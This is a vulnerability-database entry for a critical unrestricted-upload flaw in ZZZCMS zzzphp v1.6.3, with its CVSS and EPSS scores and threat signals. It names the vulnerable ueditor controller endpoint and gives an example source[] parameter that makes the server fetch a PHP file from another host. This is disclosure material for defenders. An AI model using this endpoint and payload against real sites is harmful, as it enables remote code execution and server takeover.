Showing 1 vulnerability on this page for zzzphp

Signals CISA KEV Ransomware Nuclei
zzzcms vulnerability results
VulnerabilityTitle and contextCVSSEPSSPoCsSignalsSTIX action

zzzcms zzzphp Unrestricted Upload of File with Dangerous Type

ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).

CWE-434Mar 30, 20191 related artifact
CVSS9.8v3.0EPSS6.59%PoCs0SignalsNot listed in CISA KEVNo known ransomware use1 Nuclei templateSTIX